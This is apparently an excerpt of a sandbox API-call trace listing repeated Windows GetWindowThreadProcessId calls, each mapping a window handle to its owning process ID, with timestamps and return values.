	[0852.257] GetWindowThreadProcessId (in: hWnd=0x1097c, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0x1ce4
	[0852.257] GetWindowThreadProcessId (in: hWnd=0x1093c, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0x1b24
	[0852.257] GetWindowThreadProcessId (in: hWnd=0x20942, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0x14e0
	[0852.257] GetWindowThreadProcessId (in: hWnd=0x204b0, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0x17f0
	[0852.257] GetWindowThreadProcessId (in: hWnd=0x10952, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0x854
	[0852.257] GetWindowThreadProcessId (in: hWnd=0x10950, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0x1268
	[0852.257] GetWindowThreadProcessId (in: hWnd=0x1094e, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0x1624
	[0852.257] GetWindowThreadProcessId (in: hWnd=0x1094c, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0x1b9c
	[0852.257] GetWindowThreadProcessId (in: hWnd=0x1094a, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0x16f4
	[0852.258] GetWindowThreadProcessId (in: hWnd=0x10948, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0x145c
	[0852.258] GetWindowThreadProcessId (in: hWnd=0x1093e, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0x17d0
	[0852.258] GetWindowThreadProcessId (in: hWnd=0x206ba, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0x1d28
	[0852.258] GetWindowThreadProcessId (in: hWnd=0x1093a, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0xcb8
	[0852.258] GetWindowThreadProcessId (in: hWnd=0x20614, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0x1190
	[0852.258] GetWindowThreadProcessId (in: hWnd=0x2041c, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0x3a8
	[0852.258] GetWindowThreadProcessId (in: hWnd=0x20420, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0x1bd0
	[0852.258] GetWindowThreadProcessId (in: hWnd=0x304c0, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0x1bfc
	[0852.258] GetWindowThreadProcessId (in: hWnd=0x108b8, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0x1a78
	[0852.258] GetWindowThreadProcessId (in: hWnd=0x108b2, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0x1b90
	[0852.259] GetWindowThreadProcessId (in: hWnd=0x108ac, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0x1b04
	[0852.259] GetWindowThreadProcessId (in: hWnd=0x108a0, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0x1b34
	[0852.259] GetWindowThreadProcessId (in: hWnd=0x1088e, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0x1b64
	[0852.259] GetWindowThreadProcessId (in: hWnd=0x1087c, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0x1bb0
	[0852.259] GetWindowThreadProcessId (in: hWnd=0x204f6, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0x1acc
	[0852.259] GetWindowThreadProcessId (in: hWnd=0x1083e, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0x1a2c
	[0852.259] GetWindowThreadProcessId (in: hWnd=0x2042c, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0x19a8
	[0852.259] GetWindowThreadProcessId (in: hWnd=0x10836, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0x1944
	[0852.259] GetWindowThreadProcessId (in: hWnd=0x10826, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0x18c8
	[0852.259] GetWindowThreadProcessId (in: hWnd=0x10822, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0x18ac
	[0852.259] GetWindowThreadProcessId (in: hWnd=0x1081e, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0x18ec
	[0852.260] GetWindowThreadProcessId (in: hWnd=0x1081a, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0x1898
	[0852.260] GetWindowThreadProcessId (in: hWnd=0x10810, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0xc98
	[0852.260] GetWindowThreadProcessId (in: hWnd=0x1080a, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0x153c
	[0852.260] GetWindowThreadProcessId (in: hWnd=0x10806, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0x1808
	[0852.260] GetWindowThreadProcessId (in: hWnd=0x10790, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0x12a4
	[0852.260] GetWindowThreadProcessId (in: hWnd=0x1078e, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0x1740
	[0852.260] GetWindowThreadProcessId (in: hWnd=0x10784, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0x16c4
	[0852.260] GetWindowThreadProcessId (in: hWnd=0x107c2, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0x1820
	[0852.260] GetWindowThreadProcessId (in: hWnd=0x107b4, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0x16ac
	[0852.260] GetWindowThreadProcessId (in: hWnd=0x1079a, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0x1858
	[0852.261] GetWindowThreadProcessId (in: hWnd=0x1077e, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0x1664
	[0852.261] GetWindowThreadProcessId (in: hWnd=0x10778, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0x10b4
	[0852.261] GetWindowThreadProcessId (in: hWnd=0x10774, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0x10ac
	[0852.261] GetWindowThreadProcessId (in: hWnd=0x20378, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0x10ec
	[0852.261] GetWindowThreadProcessId (in: hWnd=0x10766, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0x1068
	[0852.261] GetWindowThreadProcessId (in: hWnd=0x10762, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0x17e0
	[0852.261] GetWindowThreadProcessId (in: hWnd=0x1075e, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0x102c
	[0852.261] GetWindowThreadProcessId (in: hWnd=0x1075a, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0x17a4
	[0852.261] GetWindowThreadProcessId (in: hWnd=0x2035a, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0x1050
	[0852.261] GetWindowThreadProcessId (in: hWnd=0x1072c, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0x1694
	[0852.262] GetWindowThreadProcessId (in: hWnd=0x1071e, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0x1770
	[0852.262] GetWindowThreadProcessId (in: hWnd=0x10710, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0x1720
	[0852.262] GetWindowThreadProcessId (in: hWnd=0x10702, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0x165c
	[0852.262] GetWindowThreadProcessId (in: hWnd=0x106ca, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0x1578
	[0852.262] GetWindowThreadProcessId (in: hWnd=0x204a6, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0x16c0
	[0852.262] GetWindowThreadProcessId (in: hWnd=0x106c4, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0x161c
	[0852.263] GetWindowThreadProcessId (in: hWnd=0x106c0, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0x1638
	[0852.263] GetWindowThreadProcessId (in: hWnd=0x20362, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0x15c8
	[0852.263] GetWindowThreadProcessId (in: hWnd=0x106be, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0x1554
	[0852.263] GetWindowThreadProcessId (in: hWnd=0x106bc, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0x1674
	[0852.263] GetWindowThreadProcessId (in: hWnd=0x106b4, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0x1520
	[0852.263] GetWindowThreadProcessId (in: hWnd=0x1068e, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0x14bc
	[0852.263] GetWindowThreadProcessId (in: hWnd=0x1067e, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0xf8c
	[0852.263] GetWindowThreadProcessId (in: hWnd=0x1066e, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0xe9c
	[0852.263] GetWindowThreadProcessId (in: hWnd=0x1065e, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0x1434
	[0852.263] GetWindowThreadProcessId (in: hWnd=0x1064e, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0x14ec
	[0852.264] GetWindowThreadProcessId (in: hWnd=0x1063e, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0xfcc
	[0852.264] GetWindowThreadProcessId (in: hWnd=0x1062e, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0x12ac
	[0852.264] GetWindowThreadProcessId (in: hWnd=0x1062a, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0x1484
	[0852.264] GetWindowThreadProcessId (in: hWnd=0x10626, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0x934
	[0852.264] GetWindowThreadProcessId (in: hWnd=0x10622, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0xc0c
	[0852.264] GetWindowThreadProcessId (in: hWnd=0x1061c, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0xb08
	[0852.264] GetWindowThreadProcessId (in: hWnd=0x10610, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0x948
	[0852.264] GetWindowThreadProcessId (in: hWnd=0x1060c, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0x1178
	[0852.264] GetWindowThreadProcessId (in: hWnd=0x105fa, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0x13e0
	[0852.264] GetWindowThreadProcessId (in: hWnd=0x105ea, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0xcd0
	[0852.265] GetWindowThreadProcessId (in: hWnd=0x105da, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0x13fc
	[0852.265] GetWindowThreadProcessId (in: hWnd=0x105c6, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0xdc8
	[0852.265] GetWindowThreadProcessId (in: hWnd=0x105b6, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0xc18
	[0852.265] GetWindowThreadProcessId (in: hWnd=0x105a6, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0xc2c
	[0852.265] GetWindowThreadProcessId (in: hWnd=0x10580, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0xa1c
	[0852.265] GetWindowThreadProcessId (in: hWnd=0x10578, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0x1244
	[0852.265] GetWindowThreadProcessId (in: hWnd=0x10574, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0xdb0
	[0852.265] GetWindowThreadProcessId (in: hWnd=0x20356, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0x1398
	[0852.265] GetWindowThreadProcessId (in: hWnd=0x10566, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0x1358
	[0852.265] GetWindowThreadProcessId (in: hWnd=0x10562, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0x1370
	[0852.266] GetWindowThreadProcessId (in: hWnd=0x1055e, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0x1340
	[0852.266] GetWindowThreadProcessId (in: hWnd=0x10558, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0x130c
	[0852.266] GetWindowThreadProcessId (in: hWnd=0x10550, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0x12c0
	[0852.266] GetWindowThreadProcessId (in: hWnd=0x2053a, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0x12e4
	[0852.266] GetWindowThreadProcessId (in: hWnd=0x1051a, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0x1270
	[0852.266] GetWindowThreadProcessId (in: hWnd=0x1050a, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0x1298
	[0852.266] GetWindowThreadProcessId (in: hWnd=0x104fa, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0x120c
	[0852.266] GetWindowThreadProcessId (in: hWnd=0x204d6, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0x122c
	[0852.266] GetWindowThreadProcessId (in: hWnd=0x104ce, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0x11c4
	[0852.266] GetWindowThreadProcessId (in: hWnd=0x202d6, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0x11b0
	[0852.266] GetWindowThreadProcessId (in: hWnd=0x104c8, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0x1188
	[0852.267] GetWindowThreadProcessId (in: hWnd=0x104c4, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0x1148
	[0852.267] GetWindowThreadProcessId (in: hWnd=0x202e6, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0x1160
	[0852.267] GetWindowThreadProcessId (in: hWnd=0x30272, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0x10fc
	[0852.267] GetWindowThreadProcessId (in: hWnd=0x104bc, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0xe34
	[0852.267] GetWindowThreadProcessId (in: hWnd=0x104ac, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0xea4
	[0852.267] GetWindowThreadProcessId (in: hWnd=0x1048e, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0x514
	[0852.267] GetWindowThreadProcessId (in: hWnd=0x1047e, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0xe48
	[0852.267] GetWindowThreadProcessId (in: hWnd=0x1046e, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0xbc8
	[0852.267] GetWindowThreadProcessId (in: hWnd=0x1045e, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0xdf8
	[0852.267] GetWindowThreadProcessId (in: hWnd=0x1044c, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0x318
	[0852.267] GetWindowThreadProcessId (in: hWnd=0x10440, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0xcac
	[0852.268] GetWindowThreadProcessId (in: hWnd=0x10438, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0x8bc
	[0852.268] GetWindowThreadProcessId (in: hWnd=0x10434, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0xf9c
	[0852.268] GetWindowThreadProcessId (in: hWnd=0x10430, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0xf48
	[0852.268] GetWindowThreadProcessId (in: hWnd=0x10414, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0xe40
	[0852.268] GetWindowThreadProcessId (in: hWnd=0x10410, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0xecc
	[0852.268] GetWindowThreadProcessId (in: hWnd=0x1040c, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0xeb8
	[0852.268] GetWindowThreadProcessId (in: hWnd=0x10408, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0xe80
	[0852.268] GetWindowThreadProcessId (in: hWnd=0x10404, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0xe98
	[0852.268] GetWindowThreadProcessId (in: hWnd=0x10400, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0xe60
	[0852.268] GetWindowThreadProcessId (in: hWnd=0x103fc, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0xee4
	[0852.268] GetWindowThreadProcessId (in: hWnd=0x103ee, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0xf00
	[0852.269] GetWindowThreadProcessId (in: hWnd=0x10398, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0xdf0
	[0852.269] GetWindowThreadProcessId (in: hWnd=0x10388, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0xe1c
	[0852.269] GetWindowThreadProcessId (in: hWnd=0x10380, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0xdd0
	[0852.269] GetWindowThreadProcessId (in: hWnd=0x1036c, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0xd94
	[0852.269] GetWindowThreadProcessId (in: hWnd=0x10368, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0xd74
	[0852.269] GetWindowThreadProcessId (in: hWnd=0x10364, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0xd00
	[0852.269] GetWindowThreadProcessId (in: hWnd=0x1035e, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0xcd8
	[0852.269] GetWindowThreadProcessId (in: hWnd=0x20240, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0xc84
	[0852.269] GetWindowThreadProcessId (in: hWnd=0x30220, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0xca4
	[0852.269] GetWindowThreadProcessId (in: hWnd=0x2010e, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0xc64
	[0852.270] GetWindowThreadProcessId (in: hWnd=0x10344, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0xc24
	[0852.270] GetWindowThreadProcessId (in: hWnd=0x1032a, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0xb84
	[0852.270] GetWindowThreadProcessId (in: hWnd=0x10316, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0xbac
	[0852.270] GetWindowThreadProcessId (in: hWnd=0x102f8, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0x384
	[0852.270] GetWindowThreadProcessId (in: hWnd=0x102de, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0xab8
	[0852.270] GetWindowThreadProcessId (in: hWnd=0x102da, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0x33c
	[0852.270] GetWindowThreadProcessId (in: hWnd=0x102d0, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0xa44
	[0852.270] GetWindowThreadProcessId (in: hWnd=0x102cc, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0xa64
	[0852.270] GetWindowThreadProcessId (in: hWnd=0x102c8, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0x8a8
	[0852.270] GetWindowThreadProcessId (in: hWnd=0x102c4, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0xaf0
	[0852.270] GetWindowThreadProcessId (in: hWnd=0x102c0, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0x88c
	[0852.271] GetWindowThreadProcessId (in: hWnd=0x102bc, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0xb04
	[0852.271] GetWindowThreadProcessId (in: hWnd=0x102b0, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0x910
	[0852.271] GetWindowThreadProcessId (in: hWnd=0x102ac, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0x230
	[0852.271] GetWindowThreadProcessId (in: hWnd=0x30298, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0xac0
	[0852.271] GetWindowThreadProcessId (in: hWnd=0x2029a, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0xab4
	[0852.271] GetWindowThreadProcessId (in: hWnd=0x10262, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0xaac
	[0852.271] GetWindowThreadProcessId (in: hWnd=0x10252, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0x3d0
	[0852.271] GetWindowThreadProcessId (in: hWnd=0x10242, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0x978
	[0852.271] GetWindowThreadProcessId (in: hWnd=0x10228, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0xa7c
	[0852.271] GetWindowThreadProcessId (in: hWnd=0x10224, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0x59c
	[0852.271] GetWindowThreadProcessId (in: hWnd=0x20212, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0xa88
	[0852.272] GetWindowThreadProcessId (in: hWnd=0x1021c, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0xa6c
	[0852.272] GetWindowThreadProcessId (in: hWnd=0x10214, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0xa68
	[0852.272] GetWindowThreadProcessId (in: hWnd=0x20206, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0x9f8
	[0852.272] GetWindowThreadProcessId (in: hWnd=0x20204, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0xa04
	[0852.272] GetWindowThreadProcessId (in: hWnd=0x1020a, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0x924
	[0852.272] GetWindowThreadProcessId (in: hWnd=0x10200, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0x8dc
	[0852.272] GetWindowThreadProcessId (in: hWnd=0x201ec, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0x7dc
	[0852.272] GetWindowThreadProcessId (in: hWnd=0x301d6, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0x768
	[0852.272] GetWindowThreadProcessId (in: hWnd=0x301e0, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0x764
	[0852.272] GetWindowThreadProcessId (in: hWnd=0x201e4, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0x820
	[0852.273] GetWindowThreadProcessId (in: hWnd=0x201c6, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0x810
	[0852.273] GetWindowThreadProcessId (in: hWnd=0x301f2, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0x794
	[0852.273] GetWindowThreadProcessId (in: hWnd=0x401b6, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0x83c
	[0852.273] GetWindowThreadProcessId (in: hWnd=0x501be, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0x7ac
	[0852.273] GetWindowThreadProcessId (in: hWnd=0x160162, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0xb44
	[0852.273] GetWindowThreadProcessId (in: hWnd=0x108d6, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0x6bc
	[0852.273] GetWindowThreadProcessId (in: hWnd=0x500ea, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0xb5c
	[0852.273] GetWindowThreadProcessId (in: hWnd=0x101b0, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0x838
	[0852.273] GetWindowThreadProcessId (in: hWnd=0x800a8, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0x4d0
	[0852.273] GetWindowThreadProcessId (in: hWnd=0x400b0, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0x4d0
	[0852.274] GetWindowThreadProcessId (in: hWnd=0x300c6, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0x4d0
	[0852.274] GetWindowThreadProcessId (in: hWnd=0x300d2, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0x4d0
	[0852.274] GetWindowThreadProcessId (in: hWnd=0x300ce, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0x4d0
	[0852.274] GetWindowThreadProcessId (in: hWnd=0x300d8, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0x4d0
	[0852.274] GetWindowThreadProcessId (in: hWnd=0x400b8, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0x4d0
	[0852.274] GetWindowThreadProcessId (in: hWnd=0x300ac, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0x4d0
	[0852.274] GetWindowThreadProcessId (in: hWnd=0x101ac, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0x818
	[0852.274] GetWindowThreadProcessId (in: hWnd=0x101a8, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0x5b8
	[0852.274] GetWindowThreadProcessId (in: hWnd=0x101a4, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0x494
	[0852.274] GetWindowThreadProcessId (in: hWnd=0x101a0, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0x1ec
	[0852.275] GetWindowThreadProcessId (in: hWnd=0x1019c, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0x440
	[0852.275] GetWindowThreadProcessId (in: hWnd=0x10198, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0x7e8
	[0852.275] GetWindowThreadProcessId (in: hWnd=0x10194, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0x730
	[0852.275] GetWindowThreadProcessId (in: hWnd=0x10190, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0x2c8
	[0852.275] GetWindowThreadProcessId (in: hWnd=0x1018c, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0x31c
	[0852.275] GetWindowThreadProcessId (in: hWnd=0x10188, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0x330
	[0852.275] GetWindowThreadProcessId (in: hWnd=0x10184, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0x128
	[0852.275] GetWindowThreadProcessId (in: hWnd=0x10180, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0x5c8
	[0852.275] GetWindowThreadProcessId (in: hWnd=0x1017c, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0x6f8
	[0852.275] GetWindowThreadProcessId (in: hWnd=0x10178, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0x358
	[0852.275] GetWindowThreadProcessId (in: hWnd=0x10174, lpdwProcessId=0xcdbc0 | out: lpdwProcessId=0xcdbc0) returned 0x73c
